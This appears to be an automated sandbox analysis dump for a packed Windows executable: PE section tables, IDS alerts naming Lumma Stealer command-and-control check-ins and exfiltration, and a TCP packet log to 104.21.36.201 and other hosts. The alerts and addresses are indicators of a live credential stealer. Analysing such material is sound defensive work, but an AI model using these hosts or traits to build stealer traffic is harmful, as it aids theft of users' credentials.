                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    0x10000x510000x248000cbe77588ec040c15edf7d07e7919eddFalse0.9973713077910958data7.987571678988286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    atqsxypq0x540000x2ad0000x2ac800f0d4d42a2e10ea1fd394d61277587f80unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    qsfumtfj0x3010000x10000x600d11edd6dcec17f3795d279429a90e55bFalse0.5755208333333334data4.940214585636233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .taggant0x3020000x30000x22003a05fe056d66b54e264c38ff581bd0dfFalse0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    DLLImport
                                                                                                                                                                    kernel32.dlllstrcpy
                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                    2024-12-23T08:04:10.172670+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049701104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:10.937958+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049701104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:10.937958+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049701104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:12.163814+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049703104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:12.934573+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049703104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:12.934573+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049703104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:14.529127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049709104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:17.228213+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049715104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:19.631552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049721104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:22.674668+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049732104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:23.467326+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049732104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:25.482375+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049740104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:30.676889+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049752104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:31.455213+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049752104.21.36.201443TCP
                                                                                                                                                                    2024-12-23T08:04:32.985383+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049758185.166.143.50443TCP
                                                                                                                                                                    2024-12-23T08:04:35.384918+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.104976452.217.18.140443TCP
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 23, 2024 08:04:08.952426910 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:08.952481985 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:08.952554941 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:08.953988075 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:08.954004049 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.172559023 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.172669888 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.176089048 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.176100969 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.176347017 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.228380919 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.233360052 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.233375072 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.233459949 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.938051939 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.938296080 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.938364029 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.940093994 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.940121889 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.940135002 CET49701443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.940140963 CET44349701104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.951050043 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.951076031 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:10.951134920 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.951395035 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:10.951409101 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.163733006 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.163814068 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.165487051 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.165508986 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.165751934 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.170528889 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.170573950 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.170625925 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.934597969 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.934642076 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.934751034 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.934783936 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.934961081 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.934961081 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.934994936 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.936048031 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.936115980 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.936131954 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.952766895 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.952801943 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.952913046 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:12.952954054 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:12.953227043 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.053975105 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.103488922 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.103564978 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.126260996 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.126508951 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.126544952 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.129888058 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.130033016 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.130214930 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.130214930 CET49703443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.130239964 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.130256891 CET44349703104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.316323042 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.316380024 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:13.316464901 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.316849947 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:13.316871881 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:14.529038906 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:14.529126883 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:14.530633926 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:14.530644894 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:14.530944109 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:14.532277107 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:14.532864094 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:14.532903910 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:15.886362076 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:15.886456966 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:15.886523962 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:15.888303995 CET49709443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:15.888334036 CET44349709104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:15.993621111 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:15.993685007 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:15.993798018 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:15.994338036 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:15.994352102 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:17.228002071 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:17.228213072 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:17.229877949 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:17.229897976 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:17.230158091 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:17.231421947 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:17.231620073 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:17.231662989 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:17.231712103 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:17.275332928 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:18.182331085 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:18.182441950 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:18.182499886 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:18.182787895 CET49715443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:18.182810068 CET44349715104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:18.419533968 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:18.419578075 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:18.419661045 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:18.420007944 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:18.420018911 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:19.631465912 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:19.631551981 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:19.632952929 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:19.632966042 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:19.633223057 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:19.634712934 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:19.640598059 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:19.640645981 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:19.640721083 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:19.640729904 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:20.654742956 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:20.654896021 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:20.655013084 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:20.659868956 CET49721443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:20.659895897 CET44349721104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:21.455672026 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:21.455723047 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:21.455806017 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:21.456105947 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:21.456118107 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.674473047 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.674668074 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.676358938 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.676369905 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.676610947 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:22.678092003 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.678184032 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:22.678190947 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:23.467354059 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:23.467470884 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:23.467715979 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:23.471051931 CET49732443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:23.471071959 CET44349732104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:24.268477917 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:24.268543005 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:24.268697023 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:24.269103050 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:24.269114971 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.482250929 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.482374907 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.483717918 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.483727932 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.483971119 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.494204998 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.495121002 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.495152950 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.495470047 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.495500088 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496314049 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496356964 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496489048 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496517897 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496716022 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496736050 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496882915 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496915102 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.496927977 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.496936083 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.497041941 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.497066975 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.497088909 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.497241020 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.497268915 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.539328098 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.543080091 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.543106079 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.543127060 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.543134928 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:25.543169975 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:25.543180943 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.391608953 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.391716957 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.391773939 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.391972065 CET49740443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.391987085 CET44349740104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.456614971 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.456661940 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:29.456773043 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.457165956 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:29.457201958 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.676714897 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.676888943 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.682931900 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.682941914 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.683242083 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:30.691505909 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.691533089 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:30.691612005 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455255032 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455404997 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455463886 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:31.455621958 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:31.455640078 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.455647945 CET49752443192.168.2.10104.21.36.201
                                                                                                                                                                    Dec 23, 2024 08:04:31.455653906 CET44349752104.21.36.201192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.595567942 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:31.595621109 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:31.595880985 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:31.596400976 CET49758443192.168.2.10185.166.143.50
                                                                                                                                                                    Dec 23, 2024 08:04:31.596416950 CET44349758185.166.143.50192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:32.985297918 CET44349758185.166.143.50192.168.2.10
